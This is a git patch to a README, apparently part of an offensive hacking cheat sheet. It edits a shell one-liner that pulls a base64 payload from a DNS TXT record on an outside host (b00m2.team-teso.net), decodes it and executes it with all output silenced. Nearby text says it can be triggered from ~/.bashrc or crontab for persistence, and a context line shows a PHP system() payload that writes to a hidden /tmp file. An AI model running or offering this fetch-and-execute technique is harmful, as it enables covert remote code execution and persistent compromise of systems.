From 6191c9fb7a9af8b3c773f43f5e3ed4b19159edd3 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 12 Feb 2025 09:13:30 +0000 Subject: [PATCH] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index af6cb84..35f13ac 100644 --- a/README.md +++ b/README.md @@ -1850,7 +1850,8 @@ echo -n '@system("{ id; date;}>/tmp/.b00m 2>/dev/null");' |base64 -w0 Can also be triggered via `~/.bashrc` or the user's crontab. Use (example): ```shell -bash -c 'exec bash -c "{ $(sed s/\"//g <(dig +short b00m2.team-teso.net TXT)|base64 -d);}"'&>/dev/null +# Use a "double bash" to redirect _also_ $()-subshell error to /dev/null: +bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \"|base64 -d);}"'&>/dev/null ```